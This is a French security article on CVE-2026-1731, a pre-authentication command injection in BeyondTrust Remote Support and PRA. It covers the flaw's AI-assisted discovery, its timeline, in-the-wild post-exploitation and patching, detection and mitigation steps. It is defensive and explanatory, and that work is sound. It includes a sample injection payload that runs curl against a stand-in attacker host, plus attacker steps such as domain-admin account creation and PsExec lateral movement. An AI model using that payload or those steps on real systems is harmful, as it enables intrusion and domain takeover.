CVE-2026-1731 : faille critique pre-auth RCE dans BeyondTrust Remote Support et PRA

Le 6 février 2026, BeyondTrust a publié un avis de sécurité d'urgence (BT26-02) pour la CVE-2026-1731, une vulnérabilité critique d'injection de commandes OS dans ses produits Remote Support et Privileged Remote Access (PRA). Score CVSS : 9.9 sur 10. Aucune authentification requise. Exploitation triviale. Et surtout : un proof-of-concept public disponible depuis le 10 février, avec des attaques confirmées dans la nature moins de 24 heures après sa publication.

Ce qui rend cette CVE particulièrement intéressante au-delà de sa gravité technique, c'est son mode de découverte : elle a été identifiée le 31 janvier 2026 par Harsh Jaiswal et l'équipe Hacktron AI grâce à une analyse de variants assistée par intelligence artificielle. L'IA ne se contente plus de générer du code ou de rédiger des rapports : elle trouve désormais des zero-days dans des logiciels d'entreprise critiques.

Retour complet sur cette faille, sa chronologie, son exploitation dans la nature et les mesures à prendre immédiatement si vous opérez des instances BeyondTrust.

BeyondTrust : un acteur majeur de l'accès distant sécurisé

Pour ceux qui ne connaissent pas l'éditeur, BeyondTrust fournit des solutions d'accès distant privilégié utilisées par plus de 20 000 organisations dans plus de 100 pays, dont 75 % du Fortune 100. Deux produits sont au cœur du sujet :

• Remote Support (RS) : permet aux équipes de support technique de prendre le contrôle à distance de postes de travail et serveurs pour assister les utilisateurs ou intervenir sur l'infrastructure
• Privileged Remote Access (PRA) : fournit un accès distant sécurisé aux systèmes critiques pour les administrateurs et les prestataires externes, avec enregistrement des sessions et gestion des privilèges

Ces appliances, historiquement connues sous le nom Bomgar, sont déployées en mode SaaS ou on-premise (les fameuses appliances B-series). C'est ce second mode de déploiement qui pose le plus de problèmes : environ 8 500 instances on-premise sont directement exposées sur Internet, et beaucoup tournent sur du matériel en fin de vie qui complique les mises à jour.

Le contexte historique ajoute à l'urgence. Fin 2024, le groupe chinois Silk Typhoon avait exploité deux failles BeyondTrust (CVE-2024-12356 et CVE-2024-12686) pour compromettre le Département du Trésor américain. La CVE-2026-1731 touche exactement le même type de surface d'attaque.

Anatomie de la vulnérabilité

Classification et vecteur d'attaque

La CVE-2026-1731 est classifiée comme une injection de commandes OS (CWE-78 : Improper Neutralization of Special Éléments used in an OS Command). L'attaquant envoie des requêtes spécialement construites à l'appliance BeyondTrust, sans aucune authentification préalable, et obtient l'exécution de commandes système dans le contexte de l'utilisateur du service.

Les caractéristiques CVSS parlent d'elles-mêmes :

CVE-2026-1731
Score CVSSv4 : 9.9 / 10 (Critique)
Type          : OS Command Injection (CWE-78)
Vecteur       : Réseau (AV:N)
Complexité    : Faible (AC:L)
Privilèges    : Aucun (PR:N)
Interaction   : Aucune (UI:N)
Impact        : Confidentialité, Intégrité, Disponibilité (CIA) = Élevé

En clair : n'importe qui sur Internet peut envoyer une requête HTTP à une instance BeyondTrust vulnérable et exécuter des commandes système. Pas de mot de passe, pas d'interaction utilisateur, complexité d'exploitation faible.

Le endpoint vulnérable : get_portal_info

La faille réside dans le endpoint get_portal_info, accessible via WebSocket sur le chemin /nw. C'est le même endpoint qui avait été exploité dans la CVE-2024-12356, celle utilisée par Silk Typhoon contre le Trésor américain. La cause racine est une évaluation arithmétique Bash non sécurisée (unsafe Bash arithmetic evaluation) dans un script accessible via WebSocket.

Concrètement, des paramètres fournis par l'utilisateur dans la requête WebSocket sont passés sans sanitisation suffisante à une évaluation Bash. Un attaquant peut injecter des commandes arbitraires via des constructions comme :

# Exemple conceptuel d'injection via évaluation arithmétique Bash
# L'entrée utilisateur est passée à une expression $(( ))
# L'attaquant injecte via la syntaxe $() de Bash

# Évaluation arithmétique vulnérable (pseudocode)
result=$(( ${user_input} ))

# Payload d'injection :
# user_input = "1$(curl http://attacker.com/callback)"
# Bash résout d'abord la substitution de commande $()
# puis tente l'évaluation arithmétique

# Le serveur exécute :
result=$(( 1$(curl http://attacker.com/callback) ))
# → curl s'exécute avec les privilèges du processus BeyondTrust

La subtilité de cette classe de vulnérabilité est que l'évaluation arithmétique Bash ($(( ))) résout les substitutions de commandes ($()) avant de calculer le résultat. Un développeur qui pense ne manipuler que des nombres se retrouve à exécuter des commandes système.

Versions affectées et correctifs

Les versions impactées et les correctifs disponibles :

Produit                    Versions vulnérables    Version corrigée
─────────────────────────  ─────────────────────   ─────────────────
Remote Support (RS)        ≤ 25.3.1                25.3.2 (patch BT26-02-RS)
Privileged Remote Access   ≤ 24.3.4                25.1.1 (patch BT26-02-PRA)

Point important : les versions PRA 25.1 et supérieures ne sont pas affectées. Le problème concerne principalement les déploiements on-premise qui n'ont pas été mis à jour depuis plusieurs mois, ce qui est malheureusement courant avec les appliances matérielles.

La découverte par IA : un tournant pour la recherche de vulnérabilités

L'aspect le plus remarquable de cette CVE est son mode de découverte. Le 31 janvier 2026, Harsh Jaiswal (co-fondateur de Hacktron AI) et Mohan Sri Rama Krishna Pedhapati ont identifié la faille grâce à une technique d'analyse de variants assistée par IA.

Le principe de l'analyse de variants (variant analysis) est connu en sécurité : quand une vulnérabilité est découverte dans un composant logiciel, on recherche des patterns similaires dans le même codebase ou dans d'autres produits. Historiquement, c'est un travail manuel, méthodique et chronophage. L'innovation ici est l'automatisation par IA de ce processus.

Hacktron AI décrit son approche comme des scans autonomes conçus pour découvrir des classes de vulnérabilités et leurs variants à grande échelle sur des logiciels d'entreprise. En partant de la CVE-2024-12356 (la faille exploitée par Silk Typhoon), leur système a identifié que le même pattern d'injection existait dans une variante non corrigée du même endpoint.

Les implications sont considérables :

• Accélération de la découverte : ce qui prenait des semaines d'audit manuel peut être fait en heures par un système automatisé
• Couverture systématique : l'IA peut tester des milliers de variations de payload sur tous les endpoints accessibles, là où un chercheur humain se concentrerait sur les plus probables
• Analyse de variants à grande échelle : une seule CVE connue peut servir de point de départ pour découvrir des dizaines de failles similaires dans des produits connexes
• Risque dual-use : si l'IA permet aux chercheurs légitimes de trouver des failles plus vite, elle offre le même avantage aux attaquants

C'est un signal fort pour l'industrie. La sécurité des agents IA est déjà un sujet brûlant, mais ici c'est l'IA comme outil offensif et défensif de recherche de vulnérabilités qui prend une dimension concrète. On passe du théorique à la preuve par la CVE.

Chronologie complète de l'incident

La timeline de cette CVE est un cas d'école de la vitesse à laquelle une vulnérabilité critique passe de la découverte à l'exploitation massive :

Date                 Événement
──────────────────   ──────────────────────────────────────────────────
31 janvier 2026      Découverte par Harsh Jaiswal / Hacktron AI
                     via analyse de variants assistée par IA

2 février 2026       BeyondTrust patche automatiquement toutes les
                     instances SaaS (cloud)

6 février 2026       Publication de l'avis de sécurité BT26-02
                     Attribution du CVE-2026-1731

9 février 2026       Rapid7 publie une analyse technique détaillée
                     ~11 000 instances exposées identifiées

10 février 2026      Proof-of-concept publié sur GitHub
                     Premières tentatives d'exploitation observées

11 février 2026      GreyNoise détecte une reconnaissance massive
                     86% des scans proviennent d'une seule IP

12 février 2026      Rapid7 publie un PoC complet
                     Deux outils d'exploitation distincts identifiés

13 février 2026      Exploitation active confirmée par Arctic Wolf
                     CISA ajoute la CVE au catalogue KEV
                     Déploiement de SimpleHelp RMM sur les cibles

16 février 2026      Exploitation généralisée en cours

Moins de 10 jours entre la publication du patch et l'exploitation active dans la nature. Moins de 24 heures entre la publication du PoC et les premières attaques. C'est le tempo standard des CVE critiques en 2026 : le temps de grâce pour patcher n'existe plus.

Exploitation dans la nature : ce que font les attaquants

Reconnaissance massive et ciblée

GreyNoise a documenté la phase de reconnaissance avec une précision remarquable. Les observations clés :

• Un acteur dominant : une seule adresse IP est responsable de 86 % des sessions de scan, opérant depuis un VPN commercial basé à Francfort, actif depuis 2023
• Ciblage de ports non standard : les attaquants ne se contentent pas de scanner le port 443. Ils testent systématiquement des clusters de ports non standard, sachant que les entreprises déplacent souvent BeyondTrust sur des ports personnalisés
• Empreinte technique : l'analyse JA4+ révèle un MSS de 1358 (au lieu du 1460 standard), confirmant l'encapsulation VPN. 100 % des sessions présentent des caractéristiques de stack Linux
• Deux outils d'exploitation distincts : une variante légère à 5 headers HTTP partagée entre les IPs principales, et une variante à 7 headers utilisée par 10 scanners à session unique

Point critique : ces acteurs ne sont pas des opportunistes novices. Leurs profils GreyNoise montrent qu'ils ciblent simultanément SonicWall, MOVEit Transfer, Log4j, les firewalls Sophos, et mènent du brute-force SSH et du test de credentials IoT par défaut. C'est une opération de compromission à grande échelle.

Post-exploitation : du RCE au contrôle du domaine

Arctic Wolf a documenté les tactiques post-exploitation observées sur des instances compromises. Le schéma d'attaque est méthodique :

Phase 1 : Exploitation initiale
→ Injection de commande via get_portal_info (WebSocket /nw)
→ Exécution dans le contexte du compte SYSTEM

Phase 2 : Persistance
→ Déploiement de SimpleHelp RMM (outil de gestion à distance légitime)
→ Binaires renommés (ex: "remote access.exe") dans ProgramData
→ Exécution via les processus Bomgar sous le compte SYSTEM

Phase 3 : Mouvement latéral
→ Création de comptes domaine via "net user"
→ Ajout aux groupes "Enterprise Admins" et "Domain Admins"
→ Scan Active Directory via AdsiSearcher
→ Déploiement de SimpleHelp sur d'autres machines via PsExec
→ Requêtes SMBv2 Impacket dans les environnements compromis

Phase 4 : Objectif final
→ Contrôle complet du domaine Active Directory
→ Position idéale pour déploiement de ransomware

Le choix de SimpleHelp comme outil de persistance est tactiquement intelligent : c'est un logiciel de gestion à distance légitime, moins susceptible de déclencher des alertes antivirus qu'un reverse shell classique.

Vérifier et corriger vos instances

Identifier les instances vulnérables

La première étape est de déterminer si vous opérez des instances BeyondTrust et quelle version elles exécutent :

# 1. Scanner votre réseau pour trouver des instances BeyondTrust
# BeyondTrust expose généralement un portail web identifiable
nmap -sV -p 443,8443,4430 --script http-title votre-réseau/24

# 2. Vérifier la version via l'interface d'administration
# Connexion à https://votre-instance/login
# Menu : Configuration → À propos
# Ou via l'API (si accessible) :
curl -sk https://votre-instance/api/v1/version

# 3. Vérifier l'exposition depuis Internet
# Utiliser Shodan ou Censys pour identifier vos assets
# Recherche Shodan : "BeyondTrust" ou "Bomgar"
# Censys a identifié ~190 832 propriétés web exposées

# 4. Vérifier les logs pour des tentatives d'exploitation
# Rechercher des patterns suspects dans les logs BeyondTrust
grep -rE "get_portal_info|/nw.*WebSocket" /var/log/beyondtrust/
# Rechercher des connexions WebSocket anormales
grep -i "websocket" /var/log/nginx/access.log | grep "/nw"

Appliquer le correctif

Pour les instances on-premise, le patch s'applique via l'interface d'administration de l'appliance :

# Procédure de mise à jour BeyondTrust on-premise
# ================================================

1. Accéder à l'interface /appliance de votre instance
   https://votre-instance/appliance

2. Section "Updates" → Vérifier les mises à jour disponibles

3. Appliquer le patch BT26-02-RS (Remote Support)
   ou BT26-02-PRA (Privileged Remote Access)

4. Redémarrer l'appliance après l'application du patch

5. Vérifier que la version est :
   - Remote Support ≥ 25.3.2
   - PRA ≥ 25.1.1

# ATTENTION : appliances legacy
# Les versions RS < 21.3 et PRA < 22.1 nécessitent
# une mise à jour séquentielle AVANT de pouvoir
# appliquer le patch BT26-02.
# Contactez le support BeyondTrust pour assistance.

Mesures de mitigation immédiates

En attendant le patching ou si vous ne pouvez pas mettre à jour immédiatement :

# 1. Restreindre l'accès réseau à l'appliance BeyondTrust
# Limiter aux IPs de confiance uniquement
# Exemple avec iptables :
iptables -A INPUT -p tcp --dport 443 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

# 2. Bloquer les connexions WebSocket vers /nw si non utilisées
# Configuration Nginx en reverse proxy :
# location /nw {
#     deny all;
#     return 403;
# }

# 3. Surveiller les indicateurs de compromission
# Rechercher des processus suspects
ps aux | grep -iE "simplehelp|remote.access|bomgar"

# Vérifier les comptes créés récemment dans AD
# PowerShell :
# Get-ADUser -Filter {Created -gt "2026-02-10"} -Properties Created

# Vérifier les ajouts aux groupes administrateurs
# Get-ADGroupMember "Domain Admins" | Select Name, SID

# 4. Activer la journalisation détaillée
# Dans l'interface BeyondTrust :
# Configuration → Security → Enable detailed logging

Pour renforcer la sécurité de vos accès distants de manière générale, l'article Sécuriser SSH : les bonnes pratiques couvre les fondamentaux de la sécurisation des accès à distance, applicables au-delà du seul protocole SSH.

Indicateurs de compromission

Si vos instances BeyondTrust étaient exposées avant le patching, recherchez activement ces indicateurs :

Indicateurs réseau :
─────────────────────────────────────────────────────────
• Connexions WebSocket anormales vers /nw (port 443)
• Callbacks vers des domaines OAST (out-of-band testing)
• MSS de 1358 dans les connexions TCP (signature VPN)
• Requêtes SMBv2 Impacket entre machines internes

Indicateurs système :
─────────────────────────────────────────────────────────
• Binaires SimpleHelp renommés dans C:ProgramData
• Processus "remote access.exe" lancés via Bomgar/SYSTEM
• Comptes utilisateurs créés après le 10 février 2026
• Ajouts aux groupes "Domain Admins" / "Enterprise Admins"
• Exécutions PsExec vers des machines du domaine

Indicateurs de reconnaissance (GreyNoise) :
─────────────────────────────────────────────────────────
• Scans sur ports non standard (pas seulement 443)
• User-Agents avec 5 ou 7 headers HTTP spécifiques
• Scans combinés BeyondTrust + SonicWall + MOVEit

Leçons et perspectives

La récurrence des failles BeyondTrust

C'est la troisième faille critique majeure dans les produits BeyondTrust en moins de 14 mois. Après les CVE-2024-12356 et CVE-2024-12686 exploitées par Silk Typhoon, la CVE-2026-1731 frappe le même endpoint (get_portal_info) avec le même type de vulnérabilité. Cela soulève des questions légitimes sur la revue de code et les processus de sécurité internes de l'éditeur.

Pour les organisations qui dépendent de BeyondTrust, c'est un signal d'alarme : il faut traiter ces appliances comme des cibles prioritaires pour les attaquants et les sécuriser en conséquence, quelle que soit la confiance accordée à l'éditeur.

L'IA accélère les deux côtés

La découverte de cette CVE par analyse de variants assistée par IA illustre un changement de paradigme dans la recherche de vulnérabilités. Les outils automatisés permettent de couvrir une surface d'analyse incomparablement plus grande qu'un audit manuel. Mais cette capacité est accessible à tous, chercheurs légitimes comme attaquants.

La fenêtre entre la publication d'un patch et l'exploitation active se réduit à chaque nouvelle CVE critique. En 2024, on parlait de quelques semaines. En 2026, c'est moins de 24 heures après la publication d'un PoC. Les équipes sécurité qui comptent sur un cycle mensuel de patching sont structurellement en retard.

Les appliances réseau restent le maillon faible

BeyondTrust, SonicWall, Fortinet, Ivanti, Palo Alto : la liste des éditeurs d'appliances réseau touchés par des failles critiques ne cesse de s'allonger. Ces équipements cumulent tous les facteurs de risque :

• Exposition directe sur Internet par conception
• Privilèges élevés sur l'infrastructure qu'ils protègent
• Cycles de mise à jour lents (appliances matérielles, contraintes de disponibilité)
• Fin de vie non anticipée pour les modèles matériels anciens
• Visibilité limitée sur ce qui s'exécute réellement sur l'appliance

Le modèle Zero Trust prend ici tout son sens : ne jamais faire confiance à un équipement réseau comme unique couche de sécurité, même quand il est censé être lui-même un outil de sécurité.

Conclusion

La CVE-2026-1731 concentre à elle seule plusieurs tendances de fond de la cybersécurité en 2026 : des appliances réseau critiques comme vecteur d'attaque principal, une fenêtre d'exploitation qui se réduit à quelques heures, et l'émergence de l'IA comme accélérateur de la recherche de vulnérabilités, pour le meilleur et pour le pire.

Les actions à retenir :

• Patcher immédiatement toutes les instances BeyondTrust RS et PRA on-premise vers les versions 25.3.2 (RS) et 25.1.1 (PRA)
• Vérifier les indicateurs de compromission si vos instances étaient exposées avant le correctif, en particulier la présence de SimpleHelp RMM et de comptes AD créés récemment
• Isoler les appliances BeyondTrust derrière des contrôles d'accès réseau stricts et ne pas les exposer directement sur Internet sans filtrage
• Planifier la migration des appliances Bomgar B-series en fin de vie qui ne peuvent plus recevoir de correctifs de sécurité
• Surveiller activement les prochaines publications de CVE BeyondTrust, le même endpoint ayant été compromis trois fois en 14 mois

Et plus largement, cette CVE rappelle une réalité inconfortable : les outils censés sécuriser l'accès distant sont eux-mêmes devenus l'une des surfaces d'attaque les plus ciblées. La sécurité ne se délègue pas à une appliance. Elle se construit en profondeur, se vérifie en continu et se met à jour en heures, pas en semaines.